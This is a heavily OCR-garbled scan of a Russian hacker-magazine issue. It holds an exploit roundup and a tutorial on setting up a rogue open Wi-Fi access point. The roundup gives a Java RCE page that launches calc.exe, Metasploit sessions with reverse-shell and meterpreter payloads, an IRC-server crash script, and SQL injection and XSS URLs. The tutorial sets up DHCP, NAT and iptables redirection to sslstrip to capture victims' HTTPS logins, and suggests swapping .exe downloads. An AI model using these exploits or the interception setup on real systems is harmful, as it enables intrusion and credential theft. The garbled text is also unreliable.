Ріеісі ЯсІІ = ііпіопі.сіі 


аз5 . §е1:0ес1агесІРіе1сІ( "Пеісіі" ) ; 


Ріеісі ЯоІ2 = ІІпіоп2.с1; 


35.5 . ее'ГОесІагесІРіеІси "Гіеісіі" ) : 


С1аз5 СІЭ55ІПІ: = 


* 


" 1 р # 

ыісІЬЬ і 


Сіаз 5 с1азз9оиЫе 




• . 1 1 [•-% л 1 р р ■ 

* . . - а - 1 


тЫ . іпѵокеЕхасІ: Гіг 


■ ^ ■ _г . 


1а55_); 



ЕХРЮІТ 

Ниже представлена атакующая НТМІ_-страница, при заходе на которую у поль- 
зователя запустится калькулятор. 



<?рЬр 

$ехр_1оі1: = 'ГКедиезѣНеасіегз" : -Г "1" : "1" . "2" : "2" . "3" : "3" . 11 4" 

“4 "."5": 11 5 " ."6":" б "."7 " ‘//7 " ^8 " 8 ’ V! 9 ": ,| 9". в ЦК<5С гірі: > ^ 



Бех ріоіі:. = 1 ѵаг ІРіІе-СртропепІіз . сіа55ез[\"@то2І11а . о ге/ЯІе /. 
1оса1і1\" ] . сгеа'ЬеІП5Іапсе(Сотропеп1:5 . іп1:егТасез.<-і 



П5Иоса1Р11е).1 



Бехріоіі:. = 1 ІРіІе . іпі!Ыі1:МРа1:Іі ( Ѵ‘С; \\\\\\ \\ИіпсІ оцз\\\\\\\Ѵ 
зуз1:ет32\\\\\\\\са1с : . ехе\” ; 



Бехріоіі: . = ’ ѵаг ргосез5=Сотропепі5 . с1а5зе5[\' , @то2І11а.огё/- 
ргосе 5з /иіі1:1 \" ] . сгеа ~ЕеІ п$1:апсе(С от ропеп1 :5. іп’ГегТасез 
пзІРгосѳзз ) ; ' ; 



Бех рі оіі:. = ' ргосезь .іпі^( ІР іІе) ; ’ ; 



Б ехріоіі:. = , рпосе55,гип(1;.гие^ [] л 0)^ѵоісІ(0 ) і '.і 



Бехріоіі: . = ' < \/5СКІРТ>!1і" РІлІМГ 1 > }! ; 




7 Аэфч-І йепіміліол Туре СотЩШр р КОЕ ѴѳікрЮЧ Овтг. 



ігііт.пѵі чапг 1* 

І.тіі* ‘-уІРіі.! 4ц 1ЯГ.ІИ.Ш.ХГ 

іиііп Іі (I К ш ІТІ V «іы ■■ 11Г ГА I Р1 /і 






/" ІимАц РЬш 



Использование Меіазріоіідля уязвимости Лама ВетРІесііопТуреСопіивіоп ВСЕ 
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3 \ 



'О 



я 



ксплоитов 



в 5 



тМ2 . іпѵокеЕхасі ( (Сіазз )гш!1) ; 

Упіопі и і = пеы Ц піопК ) : 

и1.6е1сІ2 - Бузіет. сіавз: 

Цпіоп2 и 2 = пещ Цпіоп2 0 ; 

ЯсІ2 . 5еі(и2 . Ягі і. ееіГиіІ ) ; 

тМІ .і пѵоке Ех асіСсІаззРоиЬ І е) : 

тМ2 . іпѵокеЕхасі (сІазБІпі).; 

Іг_(и2_.-Йе1сі2.-Р29 == Бу5іет.йеіБесигііуМапаЕег () ) { 

и2.ііе1сі2.~Р29 = пи] ; 

} еізе іі ( и2.ііе1сІ2.-Р30 == 5у5іет.йеіБесигііуМапаЕе гО ) -Г 
и2.6е1с12.-Р30 = пиіі: 

} еізе { 



Полный РоС можно найти на сайте автора — ЫМу/ИиДоР . 

Также существует Меіазріой- модуль: 

гпбі > изе ех рІоіі/ти Ііі/Ь го ызег / ^аѵ а іге !7 геЯе сі іоп _іѵ ре5 

тз-р ехр1оіі{ заѵа_зге17_ге6есііоп_іуре5) > зеі 5КѴН05Т 

1 92.16 8 .24.14 1 

тзі ехріоіі (^аѵа_]ге17_ге6есііоп_іуре5) > зеі^ГАКбЕТ 1 

тзТ ехріоіі (}аѵа_]ге17_геЯесііоп_іуре5) > зеі: РАѴ10АР _*-± 

ыіпсІ0И5/те1егргеіег/геѵег5е_іср 

тзР ехріоіі (заѵа_]ге17_геЯесііоп_іуре5) > зеі ІН 05 Т <-■ 

192 .168 . 24 .141 

тзі ехріоіі (іаѵа і ге!7 геЛесііоп іурег) > ехріоіі 

ТАКСЕТ5 

Заѵа7и0-7и21. 

50ШТІ0И 

Доступно обновление с исправлением данной ошибки от производителя. 

ПОВЫШЕНИЕ ПРИВИЛЕГИЙ 
В НР 5Ѵ5ТЕМ МАМСЕІѴШ НОМЕРАСЕ 

СѴ55ѵ2: 7.2 {АѴ:Е/АС:1/Аи:М/С:С/І:С/А:С) 

Дата релиза: б апреля 2013 года 

Автор: адіх 
СѴЕ: ІМ/А 

Уязвимость происходит из-за переполнения буфера глобальной переменной 
55І__ЗНАРЕ_ВА5Е_ОІН. Поскольку на файл зтМзІагІ установлен бит зеіиісі 
гооі, атакующий может получить привилегии суперпользователя. 

ЕХРЮІТ 

Существует Меіазріоіі-модуль 

тзі > и зе ехр 1оіі/1іпих/1оса1/Нр зтНзіагі 
тзі ехріоіі (Йр_зт1 , і5іагі) > зііом рауіоасіз 

тзі ехр1оіі(Іір_зтІізіагі) > зеі_РАУІ_0АР 

д епегіс/ зііеіі геѵе гзе іс р 

тзі ехріоіі (Іпр_5т(і5іагі) > зеі ЦНОБТ 1 92.168.24.1 41 
іті5і ехр1оіі(Іпр_5піИ5іагі) > ехріоіі 

ТАВСЕТ8 

НР Зузіет Мападетепі Нотераде 7.1.1 -7. 1 .2. 

зоитоы 

Доступно обновление с исправлением данной ошибки от производителя. 

00$ В ІКСВ-НѴВШО 8.0.5 

СѴ$$ѵ2: 7.2 (АѴ:Р/АС:Е/Аи:Ы/С:Ы/І:М/А:С) 

Дата релиза: 8 апреля 2013 года 
Автор: ВоЬ Ыотпотпот, Кіпдсоре 
СѴЕ: 2013-0238 

Возможно, кто-то считает, что ІРЮ давно позабыт, но он до сих пор использу- 
ется. Почти все *піх-дистрибутивы имеют как официальные, так и неофици- 
альные каналы в различных сетях. Хотя многие русские андеграунд- форумы 
и перешли на ЗаЬЬег-конференции, считается, что так безопаснее :). Сегод- 



ня мы рассмотрим уязвимость в одном из старейших ІПС-демонов, который 
чаще всего используется в РеЫап-системах. 

Уязвимость находится в файле І'іозітазк.с, конкретнее — в функции {гу_ 
рагзе_ѵ4_пеІтазк. Из-за недостаточной проверки сетевых масок атакующий 
может провести удаленную атаку и вызвать падение сервера, отправив маску 
с отрицательным значением. Пример того, как разработчик исправил ошиб- 
ку, можно посмотреть на ЗѴІМ-сервере проекта: Ь Ч.Іу/147 'ЕііРс:. 

ЕХРЮІТ 

Рассмотрим эксплойт: 

$сІіаппе!г = іпі(гап<і(16ѲѲ0) 

зепс((50СК1 л "ЗОІМ #I^4xсI^ап$с^1аппе1г\г\п ,, , 0)^ 

5 1 еер ( 1 

$к = 0;. 
сі о { 

ргіпі 

$к++; 

$сгазИпит =^1000009 - $_к * 1000 і 

зепсІ(50СК1, Л'МООЕ #Ь4хсІіап$с1іаппе1г +Ь *..'_*\@127 . 0.0. 1/_±± 

$с^а5І^пит\^\п ,, } 0) ; 

} мЬі!е(<50СК1^ 

Первую часть, где происходит аутентификация пользователя на сервере, 
мы оставим за катом и будем разбирать только «боевую» часть. Мы заходим 
на ІВС-сервер и создаем себе личный канал, где станем администратором 
канала. Далее постоянно «баним» несуществующую маску до падения серве- 
ра. Полный исходник эксплойта доступен здесь: Ы1.Іѵ/17х7кѴ ѴР. 

ТАВСЕТ8 

Ігсб-ІіуЬгісІ до 8.0.5 включительно. 

ЗОШТІОЫ 

Доступно обновление с исправлением данной ошибки от производителя. 

МНОЖЕСТВЕННЫЕ УЯЗВИМОСТИ 
В ГОЕ СМ$ 1.6.5 

СѴ55ѵ2: 7.5 {АѴ:П/АС±/Аи:М/С:Р/І:Р/А:Р} 

5.0 (АѴ:В/АС:1/Аи:Ы/С:Ы/І:Р/А:М) 

Дата релиза: 29 апреля 2013 года 
Автор: Т1их77 
СѴЕ: Ы/А 

ЗОІ-инъекции до сих пор встречаются в веб-проектах, хоть разработчики 
и делают попытки защититься. Сегодняшняя уязвимость происходит из-за 
недостаточной фильтрации получаемого параметра «еі». Разработчик посчи- 
тал, что указанной ниже функции хватит для защиты. 

тѵ5д1_геа1_е5саре_5ігіП{г($_(зЕТ [ "еі" ] ) 

ЕХРЮІТ 

Примеры эксплуатации уязвимостей. С помощью ЗОІ_-инъекции мы можем 
получить логины с паролями пользователей. 

Иі1р://ѵіс1іт/Г раіЫ /ііет. рІір?еі--1 ипіоп Беіесі 

1, и аегпате. раза вИа.І.І .1.1.1.1 ігот іое_ассоипі-- 

Для демонстрации второй уязвимости возьмем любимый аіегі: 

Іііі р: // ѵісііш/[раіІі] /ііет. рЬр?еі=<5СГірі>а1егі(1)</5сгірі> 

Автор уязвимости не сообщает, уведомил ли он разработчика, но послед- 
нее обновление на СіІНиЬ было десять месяцев назад ( зіІ.Іѵ/ЗѴАІРЛ . В ка- 
честве заплатки можно заменить функцию туздІ_геаІ_езсаре_5Ігіпд на іпіѵа! 
или сделать приведение типа с помощью (іпі) $_(ЗЕТ[''еГ]. Параноики могут 
добавить функцию НІплІзресіаІсНагз. 

ТАПСЕТ8 

Рое СМ3 до 1 .6.5 включительно. 

80ІЛІТІ0Ы 

Исправлений на данный момент нет. НС 




ее 



Взлом 
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Организация открытой \Ѵі-Рі- точки для вечеринки с клиентами 



Такие занятия, как вардрайвинг или блюджекинг, сочетающие в себе 
технологии и желание вырваться из плена четырех стен, уже давно 
исчерпали себя и угасли в забвении. Нужно что-то новое, самобытное. Когда 
я размышлял над этим, мой взгляд случайно упал на пакет ананасового 
сока, оставленного на столе еще утром. Бинго! Ведь хакинг, активный отдых 
и ананасы идеально совместимы! Не веришь? А я докажу! 




Константин Разделенный 
ака сІЬгегО 

ІіІеІпС&гооі@дтаіІ.сотп 
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ВЗРАЩИВАЕМ СВОЙ АНАНАС 

Нет, автор еще не окончательно сошел с ума и не будет сове- 
товать тебе бежать сломя голову в ближайший продуктовый 
магазин ради покупки тропического травянистого растения се- 
мейства бромелиевых. Я поведаю тебе об одноименном устрой- 
стве — Ріпеарріе, созданном нашим западным коллегой Дарре- 
ном Китченом (Оаггеп Кіісііеп) из небезызвестного УоиТиЬе-шоу 
о компьютерной безопасности Нак5. Предназначен Ріпеарріе 
для развертывания собственной ѴѴі-Рі-точки, к которой присо- 
единяются случайные клиенты с целью посерфить бесплатные 
интернеты. Одновременно держатель Ріпеарріе с особым шар- 
мом снифает и записывает весь интересующий его трафик, про- 
текающий через ананас. 

Оригинальное название устройство получило благодаря 
первоначальному замыслу прятать голую плату, антенну и акку- 
мулятор в кейс пластмассового ананаса. Впоследствии же, из- 
за непрактично широких габаритов плода, корпус был заменен 
на прямоугольный и сохранил от той концепции лишь наклейку 
с ананасом, держащим в руках меч и щит. 

Аппаратно современная модель Ріпеарріе представляет со- 
бой точку доступа АІІа АР51 (ранее использовались Роп 2100) 
с двумя ЕФіѳгпеІ-портами, поддержкой 802.11 Ь/д/п и Ы2В; 
последний порт применяется обычно для присоединения 
ЗО-модема, чтобы быть мостом между интернетом и клиен- 
тами. Актуальная модель Магк IV имеет процессор в 400 МГц 
и 32 Мб РАМ на борту. Программно же в Ріпеарріе обитает Ыпих, 
на котором работают привычные для роутера сетевые сервисы. 

Что тут скажешь, идея и девайс любопытные, и, думаю, 
каждый из нас хотел бы иметь в своем арсенале нечто подоб- 
ное. Но с другой стороны, зачем ограничивать себя отдельным 
устройством, в котором даже нет дисплея? У нас с тобой всег- 
да при себе ноутбук, заполненный до краев любимым софтом. 
Так воспользуемся этой задумкой и поднимем на лаптопе свою, 
более функционально гибкую реализацию ананаса, используя 
«традиционные» для Ыпих сетевые службы. 

ГОЛОВА И МЫСЛИ ДЛЯ НЕЕ 

Корнем данной затеи должно стать сформированное представ- 
ление о будущей сетевой инфраструктуре. Первым шагом мы 
должны добыть интернет. Конечно, можно обойтись и простым 



фишингом, подняв на ноуте веб-сервер и организовав там па- 
ру-тройку копий сайтов, обычно интересующих пользователей, 
в надежде на то, что жертва все же посетит именно их. Но проще 
быть связующим звеном между клиентами и сетью в мир. Такой 
сетью может стать либо другая ѴѴі-РІ-точка, например оттого же 
кафе, либо ЗС-модем. По большому счету нужен любой сетевой 
интерфейс с выходом в интернет. 

Я буду применять встроенную ѴѴі-РІ-карту ноутбука для вза- 
имодействия с точкой от кафе, это интерфейс ѵ/ІапО. А с помо- 
щью внешней карты (я использую АИа АѴѴІІ3036Н, с повышен- 
ной мощностью в 1000 мВт на чипсете ВеаІІек ВТІ.8187І.) мы 
начнем принимать клиентов через интерфейс ѵѵіапі . 

Итак, подключаемся к внешней сети, чтобы определить ис- 
пользуемый в кафе шлюз (маршрут по умолчанию) с помощью 
просмотра таблицы маршрутизации: 

$ __і|) г | §гер сІеРаиГЬ 

сіебаиіі: ѵіа _192 ,_168 .1. 1 сіеѵ мІапѲ ргоСо Б'Са'Ііс 

В данном случае им оказался 192.168.1.1 . Следующий шаг — 
создание собственной подсети. Пусть ей станет 192.168.2.0/24, 
для которой шлюзом будем уже мы, выбрав ІР-адрес 192.168.2.1 
для интерфейса ѵѵіапі. 

Необходимый сетевой обмен трафиком потребует от нас ре- 
шить три задачи: 

1 . Организовать раздачу ІР-адресов клиентам (ОНСР). 

2. Настроить ЫАТ между двумя сетями. 

3. Создать открытую точку доступа. 

Сделаем таблицу соответствий адресов, чтобы не запутать- 
ся в будущем (см. далее). 

ОСНОВА ОСНОВ 

Базой нашего замысла послужит взаимодействие клиентов 
между сетевыми интерфейсами. Возможно, я излишне пара- 
ноидален, но в первую очередь, чтобы не демонстрировать наш 
реальный МАС-адрес внешней карты, изменим его на фейко- 
вый: 

# _і6согтіі§ міапі Им еІИег 00:01;02:03:04:05 




ѴѴАККГЩС 



Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 



гооС Діоте/сіЬгегО 



гооТ@1оса1Ьо5Т: /Ьоте/йЬгегѲ# . /ар.5(і 5ТагТ 



создание сетевого интерфейса міапі и маршрута... 



ок ! 



создание ОНСР конфига ’/еТс/сЦкр/ЦНсрЦ.соп?' . . . 



ок ! 



запуск ОНСР сервера... 



ІпТегпеТ $у$Тет5 СопбогТіііш ОНСР 5егѵег 4.2.4 
Соругі§ЬТ 2ѲѲ4-2012 ІпТегпеТ БузТетй СопБОгТіит. 

АН ГІ5Щ5 геБегѵей. 

Рог ігѵРо, ріеазе ѵібіТ ЬТТрз ://ммм. ібс . ог§/5оТТыаге/8Нср/ 
ЫгоТе 2 ІеазеБ То 1еа5е5 -Рііе. 

ЬІБТепІПі оп І.РР/м1ап0/Ѳ0:Ѳ1:02:ѲЗ:04:Ѳ5/192. 168 .2.0/24 
Бепсііпе оп І.РЕ/м1ап0/ѲѲ: Ѳ1:Ѳ2 :ѲЗ : 04: 05/192. 168.2.0/24 

БепРіпё оп 5оскеТ/Та11Ьаск/Та11Ьаск-пеТ 

ок! 



включение маршрутизации в ядре... 



пеТ . ірѵ4. ір_Тогмаг(і = 1 
ок I 



включение маскарадинга и форвардинга. . . 



ок I 



создание конфига ’/Ттр/ЬозТарй.соп^* , . . 



ок! 



запуск ЬоБТарсі... 



гапЦот: Тгуіп§ То геаР епТгору Тгош /гіеѵ/гапбот 
СопТі§игаТіоп Ніе: /Ттр/Но$ТарР.сопТ 
сТг1_іпТегТасе_§гоио=0 
ПІ8Ѳ211: іпТег-Расе міапі іп рЬу рНуѳ 

гТкіІІ: іпіТіаІ еѵепТ: ігіх=Ѳ Туре=1 ор=Ѳ гоТТ=Ѳ Ьагй=Ѳ 
ПІ8Э211: ііаіпе йгіѵег-ЬаБеР оЯ'-сІіаппеІ ТХ 



(ІЬгегО - 



с*Ь2егѲ@1оса1Но5І::~$ Таіі -Т /ѵаг/1іЬ/(1Ьср/гіЬсргі . Іеазез 
Ыаг1:5 Б 2Ѳ13/Ѳ4/12 03:41:51; 
еп<І5 6 2013/04/13 03:41:51; 

СІ« 5 2013/04/12 03:41:51; 

ЬіпсЦпі* 5*а*е асііѵе; 
пех* ЬіпсІіп§ 5*а*е -Ргее; 
геміпсі ЬіпсІіп§ зіаіе -Ргее; 

Ьагсііл/аге е1:Ьегпе1: 9с:04:еЬ:77:Та:71; 
иісі м \ѲѲ1\244\ѲѲ4\352\007\212и"; 

сІіепІ-ИоБІіпате "іРИопе-5"; 

> _ I 



К нам подключился 
владелец іРИопе 5 

[\ 

Скрипт, выполняю- 
щий все описанные 
действия 



Утилита ЕіНегАре 
поможет узнать, чем 
занимается жертва 



ЗДГіегАре 

Рііе СарЕиге Ѵіеѵ/ Неір 



РгоЬосоІі 

ООМАІИ 



ОС ■ < 

Рэиье 5Ьор Рі еГ. 



РГОІ. ЫОСІ05 
192.1М. 2.255 



192.Ж8.2 3 



192 Ь€8 2.] 



192 163 1 1 



ес? Л "4-129193-21 г сШпіТе 1 опгіа?опаі|Ч5 сот 



199 1 0.156 Б 




^23-52-21-210 сіеріоу л+.аітаиесЬпйІ 



93 184*16.139 



ес2-1 0 7-2 0-15 3-1 7 7 . с м* р и Не- 1 а та гол а ѵи 5. сот 



ЫмП-Ш> 9 *ІеЮ 0 пгі 



Реэсііпд сіаіэ Ггот мІап2 іп ІР тогіе 
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Комплекте бою 



Последняя модель Ріпеарріе 



Подготовим сетевой интерфейс и создадим новую подсеть, 
в которой будут обитать наши ѴѴі-РІ-пользователи: 

# і-Рсогфё іЛапІ 192. 16 8.2 .1 п еѣта вк 255.255.255.0 ир 

Теперь добавим маршрут, говорящий о том, что шлюзом для но- 
вой сети 192. 168.2.0/24 являемся мы (ІР внешней карты): 







# Ір г аМ 192 . 168 .2.0 ѵіа 192.168.2.1 

ПРИГЛАШЕНЫ ВСЕ! 

Теперь необходимо пригласить в нашу сеть клиентов. Они 
не знают ее топологии, а значит, и выбрать корректно для себя 
ІР-адрес не смогут, так что обеспечим выдачу (аренду) ІР- 
адресов с помощью ОНСР-сервера. Самая популярная реали- 
зация ОНСР-сервера на данный момент — ббсрЗ. 

Устанавливаем пакет сИісрЗ-зегѵег или, в зависимости 
от дистрибутива, ізс-сіііср-зегѵег: 

# а р~Е -§ е~Е . і п 51 а 11 і зс-сІІіср-з е гуе г 

Создадим для него конфигурационный файл /еІс/бИср/ 
сІІпсрсІ.сопТ: 



На диске лежит скрипт, 
автоматически выпол- 
няющий поднятие Ѵі/і-РІ- 
точки. После короткой 
настройки переменных 
запускаем «. /ар.зіі 
зіаіі» и останавливаем 
«./ар.зіі зіор». Там 
же ты найдешь исходные 
тексты демона Нозіаргі 
с Кагта-патчами 
и скрипт рерайтера 
гр.ру. 



# Не используем динамический РИ5 (РРМ5 1 ) 

ббп5-ц рсІа1:е-з1:ѵ1е попе; 

# Игнорируем все запросы клиентов на обновление РРІМ5 

ідпоге сііепі: -.ирсіаііез; 

# Этот сервер является ответственным для нашей сети 

аи'Ы'іогі'Ьа'Ьіѵе; 



# Время аренды ІР-адреса 

сІеТаиІІ: ^еазе-іііте 600; 

тах-іеазе-іііпіе 7200; 

1о %- 'Га сі1І ~Еу 1оса17; 

# Конфигурируем информацию о подсети 

БііЬпеІ: 192.168.2.0 пеіітазк 255.255.255.0 { 

Шлюз кафе считает, что к нему подключен 
всего один клиент, и не имеет представ- 
ления о том, что за ним существует еще 
какая-то подсеть 



# Пул ІР-адресов. из которого будет выбираться 



ц ■ ‘.У " 1 — X ѵ 1 ^ ^ " Г у" ■ 

# ІР-адрес для клиентов 


гап§е 


192.168.2.3 192.168.2.254; 


# Шлюз 


сети, маска и широковещательный адрес 


орѣіоп 


гоиіегз 192.168.2.1; 


орііоп 


зиЬпеІ-шазк 255 . 255 . 255 .Ѳ; 


орііоп 


Ьгоасісазіі-асісігезз 192.168.2.255; 



# Р^-серверы. Укажем РІМ5 интернет-шлюза 

# и. в качестве глобального. РМ5 от боо^іе 

орііоп сіотаіп-пате-зегѵегз 192.168.1.1. «-■ 

8. 8. 8.8; 

I 

Чтобы сІбсрсІЗ запустился, необходимо создать РЮ-файл с со- 
ответствующими правами доступа: 

# іоис іі / ѵар/ гип/біісрсі . р_ісІ 

# сЬомп сІНсрсЦсІІісрсІ /ѵаг/гип/сііісрсі . ріб /еіс/сіііс р/^ 
сІЬсрсІ .соп/Р 

Все готово к старту! 

# /изг/зЫп/сИпсрб ^сТ /е'іс/сіііср/сіі'ісрсі . сопТ міапі 

ХАМЕЛЕОН — ВСЕМУ ГОЛОВА 

Для того чтобы пакеты ходили от клиентов через нашу сеть «про- 
зрачно», мы будем применять маскарадинг. Ведь шлюз кафе 
считает, что к нему подключен всего один клиент, и не имеет 
представления о том, что за ним существует еще какая-то под- 
сеть. С помощью МАТ мы можем маскировать пакеты подклю- 
чившихся по ѴѴі-Рі пользователей на лету, изменяя их ІР на тот, 
что используется интерфейсом ѵѵІапО во внутренней локальной 
сети кафе. 

Начнем с включения маршрутизации в ядре, чтобы Ыпих 
не отбрасывал пакеты с неизвестных адресов: 

# 5у 5СІ:1 -и пеі: . ірѵ4. ір_-Рогіѵ/агсІ=1 

Сбрасываем правила ірШЫез и очищаем таблицу ИАТ, кото- 
рая предназначена для преобразования ІР-адресов: 

# ір~РаЬ1е5 - -Р1и 5П 

# ірѣаЫез - -ІаЫе па! - -Р іизіі 

# ір±аЫе5 - -б еІеІе-сНаіп 

# ірѣаЬІез - -ІаЬІе па! — сіеіеіе-сііаіп 

Следующий шаг состоит во включении маскарадинга. Це- 
почка РОЗТРЮЦТІМС позволяет изменить пакеты на выходе. 
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з'ІЧісгозоІѢ Россия | Продукты и услуги - МогіІІа Рігеіох 

Еііе ЕсірЬ Уел НЫеыу Ееюктагк5 Гоо^ Ыеір 

І-І Хакер Опііпе - Ноте Л " КісгозоЙ России | Продукт... «.Мм. 



Г" I о ^ 



Продукты 3 агружзеньш файлы Поддержка Безопасность Купить 




Узнавайте 

новое 

ѴѴіпйоѵѵе 

ОРРісе 

ѴУтаоиз РПопе 
ХЬох 



Для домашнего использования 



■ рпДуЙГе З-^дпа дама 

••• — -і і: я _і -4“ 0"П.т 



И \ [ |. ■ 4 .* 1 1= с ’ ѵ* I “ " I" ' С _ г “ 1_ 

ЕОПр&С Псптрп-Эу йге БІПВ ГЕЙЧЕ 




Вот так у пользователей выглядит сайт МісговоП 



Тот самый корпус в виде ананаса 



Разрешим маскировку исходящего трафика от ѵѵіапО, чтобы 
в конечном итоге он попал в подсеть кафе с 1Р интерфейса 
ѵѵіапО: 

#_ірѣаЬ1ез -ѣ паѣ -А Р05ТК0УТІМС -о мІапѲ ±± 

-І МАЗдіІЕКАРЕ 



моном (іозіарсі. Доступен он из репозиториев всех популярных 
дистрибутивов: 

# а рѣ-^еѣ іпзѣаіі Рюз ѣ а рсІ 

Создаем конфигурационный файл /ІтрДюзІарсІ.сопТ: 



Чтобы дальше смаршрутизировать идущий к клиентам тра- 
фик на интерфейс ѵѵ!ап 1 , разрешим его пересылку, то естьфор- 
вардинг в нашу локалку: 

# ірѢа ЬІез -А РОКІлІАШЭ. -і ыіапі А ССЕРТ 

Теперь когда пользователь нашей подсети захочет посетить 
какой-нибудь сайт, то отправит запрос на интерфейс ѵѵіапі . 

Ядро замаскарадит ІР-адрес клиента на адрес интерфейса 
ѵі/ІапО, чтобы отправить данные в подсеть кафе от своего имени. 

После получения информации от сайта ответ придет на интер- 
фейс ѵѵіапО, и затем, уже не меняя адрес (там ІР-адрес сайта), 
пакеты отфорвардятся клиенту в ѵѵіапі . 

Как и для любой порядочной сети, нам потребовался бы 
свой ОМЗ-сервер, который мог бы обслуживать подключенных 
к точке клиентов. Но поскольку они ничего не знают ни о ее то- 
пологии, ни о шлюзе 192.168.1.1, который мог бы отвечать на их 
ОМЗ-запросы, то почему просто не завернуть весь ОІМЗ-трафик 
от нас (192.168.2.1 ) на роутер кафе (192.168.1 .1): 

# ІрІіаЫез -1= паѣ _-А фКЕКОЩІІЖВ исір --б р огѣ 53 ^ 

-1РМАТ -_-ѣо 1 92.16 8.1.1 

ОТКРОЙ ДВЕРЦУ ЛОВУШКИ 

Свое «общение» с пользователями мы обеспечим посред- 
ством протокола физического уровня ІЕЕЕ 802.11, то есть ѴѴі-Рі. 

Для взаимодействия с ним воспользуемся стандартной реали- 
зацией для ІЛЧІХ-совместимых систем, а также Ріпеарріе, де- Таблица адресов 



# Сетевой интерфейс, который будет использован 

# точкой доступа 

Іпѣегѣасе=и1ап1 

# Супероригинальное название точки 

55ісІ=ѣгее іпѣегпеѣ 
сМаппе1=6 

# Драйвер, бозѣарсі должен быть собран с опцией 

# С0Ы Р І6 РКІѴЕК 1М[_80211=у 

сІгіѵег=п180211 



# Нам надо, чтобы все видели нашу точку 

ібОоге_Ьгоасіса5ѣ_53іс1=0 

# Будем поддерживать как ираі. так и ыра2 
а и ѣЬ а1^з=3 



# Журналируем только информационные сообщения 

1о§§ег_зуз1оя=-1 

1о§§ег_зуз1оё_1еѵе1=2 

1о§§е г_зѣ сІоиѣ= - 1 

1о§§ег_зѣсІоиѣ_1еѵе1=2 



# Использование управляющего интерфейса только 

# группой гооѣ 

сѣгі іпѣегѣасе е гоир=0 



# Не используем МАС-списки доступа для подключения 

# к нашей точке 

тасасИг асі=0 



ІР-адрес 



192.168.1.0/24 



192.168.1.1 



192.168.2.0/24 

192.168.2.1 



192.168.2.3—192.168.2.224 




ѵѵіапО 

ѵѵіапі 

ѵѵіапі 



ѵѵіапі 



Шлюз в интернет в подсети кафе 




Наш ІР-адрес для внешней карты, он же йНСР-сервер 











мы отдадим клие 
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ѵѵІапО 192.168.1.0/24 


ѵѵіап 1 192.168.2.0/24 


Г — ч ) 


г. - - к * - т ч т . * 

192.168.2.4 


1 1 І * — ™ , 


. 1*ЧГ 1 


/ !*.• — 1 / ізя 1 ( 


■ Д \ 


. ^ 192.168.1.1 


“ " ' Ч 192.163.2.5 

192.168.2.1 4 

у Ч 




192.168,2.6 



Стоит отметить, что в том же Ріпеарріе используется на- Схема сети 
бор патчей к Гтозіарсі под названием Кагта ( ѵѵ.сііа іпіп іа. ога / 

кагта). Патчи позволяют во время работы сервера наблюдать 
и выводить в зісіои! информацию об обмене пакетами клиентов 
с соседними точками. При желании эти данные можно собирать 
и парсить, получая одновременно и представление об окружа- 
ющем беспроводном мире. Изначально над концепцией рабо- 
тал Дино Дай Зови (Оіпо Оаі 2оѵі) для проекта МабѵѵіТі, затем 
идею подхватил Робин Вуд (ЯоЬіп ѴѴооб) из ОідіМіпіа.огд, кото- 
рый решил перенести эту идею в бозіарсі, Плюс Кармы в том, 
что все данные получаются в пассивном режиме, то есть без на- 
шего вмешательства в сторонний пакетообмен. 

И вот настал желанный час, запускаем последний компо- 
нент нашей системы: 

# /изг/зЬіп/ІіозѣарсІ -сісі -Р /ѣтр/І'Ю5*арсІ .рігі • ■ 

/Іітр/боз'ІіарД. соп-р 



Распаковываем архив и устанавливаем ззізігір, используя 
функционал руібоп-сіізіиіііз: 

# руіЬоп зеѣир.ру іп5*а1Д. 

Для работы ззізігір необходимо указать порт, который 
она будет слушать для получения и обработки трафика. Оста- 
ется лишь перенаправить НТТР-пакеты, идущие на порт 80, 
81, 8000 и 8080, на произвольный другой, например 8888. Так 
что добавим еще одно правило к нашей таблице ІЧАТ: 

# ірІіаЫ ез -1 п аѣ -А Р КЕКОЦТІМл -з 192 .168.2. 0/ 24 
1: ср -т т иіѣірогі: --с ірогі: 80.81.8000.8080 *-» 

-1 КЕРІКЕСТ --Г О -РОГЕ 8888 

Теперь запускаем ззІзЕгір, которая начнет прослушивать 
порт 8888 (ключ ’-Г) и логировать «полезный» НТТРЗ-трафик 
в файл ззІзЕгір.Іод (ключ ’-ѵ/): 

І /изг/ІосаІ/Ьіп/ззІЗ'Егір -1 8 888 -ц ззізігір. І ое 

ЭТОТ АП ПЕТИТНЫЙ КАЛЬМАР 

Мы достигли изначальной цели. Но этой затеей дело может 
не ограничиться! Если тебе хочется понаблюдать за удивленны- 
ми лицами наивно-невинных пользователей, сидящих рядом, 
то на ум приходит масса иных шалостей, список которых ты в со- 
стоянии легко расширить самостоятельно. Например, можно 
создать ЫР!І_ гѳѵѵгіЕег для ЗдиісІ, который подменял бы все ссылки 
с *.ехе на собственный бинарник. А можно просто подставлять 
вместо всех картинок в НТТР-трафике изображение милой ко- 
шечки, ведь милых кошечек любят все :). 

Одержимые новой идеей, устанавливаем Здиіб из репози- 
тория: 

# ар/Е^еѣ ^пБІіаІЗ^ здиісІЗ здиісІЗ-соттоп 



И ЗДЕСЬ ПОНЮХАЕМ, И ТАМ 

Наша задумка не стоила бы и выеденного яйца, если бы мы 
не реализовали пронюхивание ананасовой сети. Для реше- 
ния задачи вполне мог бы подойти любой сниффер, например 
ѵѵігезЕіагк, но его в текущих реалиях уже недостаточно. Ведь 
большинство самых популярных сайтов давно прячутся за ши- 
рокой спиной ЗЗЦ который шифрует самое вкусное — данные 
аккаунтов. Но это не проблема, так как на горизонте, в разве- 
вающемся плаще супермена, на помощь спешит ззізігір. 

Ззізітір была придумана Мокси Марлинспайком (Мохіе 
Магііпзріке) — человеком, который не в первый раз изобрел 
нетривиальный путь обхода 38І_-сертификатов. В ее основе 
лежит простая идея о том, чтобы, находясь в МІТМ, перене- 
сти НТТРЗ-соединение с пользователя на себя, обмениваясь 
с жертвой лишь открытым НТТР, а себе оставляя интересу- 
ющие данные. То есть мы становимся посредниками между 
пользователем и защищенным сервером, заменяя налету все 
ссылки страниц с ІШрз на ІтЕЕр. Утилита умеет подменять даже 
Еаѵісоп — маленькую иконку — логотип сайта на замочек, по- 
хожий на тот, который появляется в браузере при пользовании 
ЗЗІ_. 

Итак, идем за последней версией ззізітір на аоо .аі/і7ѳ іХ. 
У нее существует всего одна зависимость — необходима би- 
